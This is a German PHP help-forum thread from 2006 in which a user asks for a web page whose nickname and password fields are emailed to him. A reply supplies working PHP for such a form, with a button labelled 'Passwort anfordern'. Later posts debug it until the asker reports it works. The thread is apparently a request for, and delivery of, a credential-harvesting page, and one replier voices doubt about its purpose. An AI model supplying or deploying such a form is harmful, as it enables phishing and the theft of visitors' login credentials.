Name und Passwort an e-mail senden

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Name und Passwort an e-mail senden

    Ich suche ein Script oder HTML Code für eine Seite
    wo ein Textfeld mit der Überschrift "Nick" steht und ein Passwortfeld
    mit der Überschrift "Passwort" und das ganze soll dann auf meine E-Mail adresse gesendet wird, hab schon ein paar mal Probiert aber ich habs nicht gebacken gekriegt, und mit Programme wie Namo Webeditor oder Open Office 2 geht auf nich so wie ich will.
    Ich hoffe ihr könnt mir helfen

    MFG
    Mr T-Bone

  • #2
    Ganz ehrlich frage ich mich zwar, wofür ein solches Script gut sein soll, aber hier ne Möglichkeit zur Umsetzung...


    PHP-Code:
    <?
     if(!empty($_POST['send']))
      {
       $text="$Nick und $Passwort";
       if(mail('hallo@xxlmail24.de', 'Betreffzeile', $text, 'From: Peter Panther<hallo@xxlmail24.de>')) 
        {
         echo 'eMail wurde versandt.';
        }
       else 
        {
         echo 'Sendefehler.\n';
        }
      }
       echo"<form action='' method='post' target=''>
        <table>
         <tr>
          <td>Nick:</td>
          <td> <input type='Text' name='Nick' size='30'></td>
         </tr>
         <tr>
          <td>Passwort:</td>
          <td> <input type='Password' name='Passwort' size='30'></td>
         </tr>
         <tr>
          <td></td>
          <td><input type='Submit' class='button' name='send' value='Passwort anfordern'>
          </td>
         </tr>
        </table>
       </form>";
    ?>
    Zuletzt geändert von robbe21; 05.03.2006, 21:25.

    Kommentar


    • #3
      Danke Robbe21

      aber es funktioniert nich ganz,

      da ich nicht gut bin in PHP , wollte ich fragen ob mir einer sagen kann wo ich die E-Mail eintagen muss und wie, nehmen wir an die E-Mail adresse heist hallo@xxlmail24.de

      Danke im Vorraus
      MFG T-Bone
      Zuletzt geändert von Mr T-Bone; 05.03.2006, 20:41.

      Kommentar


      • #4
        da ich kein PHP habe
        ... ist es relativ unsinnig in eine, PHP-Forum nach einem Script zu fragen.

        Nutz die Mailfunktion des Internet-Explorers (haben andere Browser das auch?) Wie das geht, hab ich nicht im Kopf. Müsste also genauso suchen wie du.

        Alternativ kannst du auch zu nem Form-Mail Hoster gehen. Die bieten auch genaue Anleitungen...

        Kommentar


        • #5
          achso, wenns für deine Homepage ist, dann benutz doch den Formmailer der in deinem Webspace dabei ist.

          http://www.sprayer-connection.de/pageID_3049719.html

          Kommentar


          • #6
            Ich hab mich verschrieben und meinte das ich nicht gut bin in PHP war aber irgendwie nich ganz bei der sache!

            Mein Seitge ist bei Strato und mit dem sogenannten "Live Pages" Programm gemacht und ist leider kaum erweiterbar , aber es lässt sich eine Weiterleitung einstellen und dann hab ich eine Eigene Seite gmacht und dafür Brauch ich das und der Code oben, da möchte ich blos wissen wo meine E-Mail adresse genau reinkommt, ich hatte da so eine Ahnung hat aber nicht funktioniert

            Kommentar


            • #7
              if(mail('$Deine eMail', 'Betreffzeile', '$Nick und $Passwort', 'From: $Vorname $Name <$Deine eMail>'))
              Jetzt denk mal bitte scharf nach!

              Kommentar


              • #8
                Also

                if(mail('$hallo@xxlmail24.deil', 'Betreffzeile', '$Nick und $Passwort', 'From: $Vorname $Name <$hallo@xxlmail24.del>'))

                , hab ich ausprobiert ,funktioniert aber nicht

                Kommentar


                • #9
                  ich denk deine email adresse ist hallo@... nicht $hallo....

                  Kommentar


                  • #10
                    ich dachte das $ gehört dazu ( ach man ich kanns halt nicht)
                    Bin ja noch fleissig am Lernen

                    Kommentar


                    • #11
                      Habs bei Ohost hochgeladen und funktioniert immer noch nicht, da steh dann beim aufrufen der seite:

                      Parse error: parse error, unexpected $ in /usr/export/www/hosting/sprayer/Test2.php on line 34

                      was kann das heissen?

                      Kommentar


                      • #12
                        habs selbst nochmal gecheckt und zwei fehler mitbekommen, das listing oben ist aktualisiert und funzt jetzt definitiv, sorry nochmal

                        Kommentar


                        • #13
                          wieso sorry is doch nett das du mir hilfst und dafür danke
                          und funktionieren tut es auch super
                          Zuletzt geändert von Mr T-Bone; 05.03.2006, 21:32.

                          Kommentar

                          Lädt...
                          X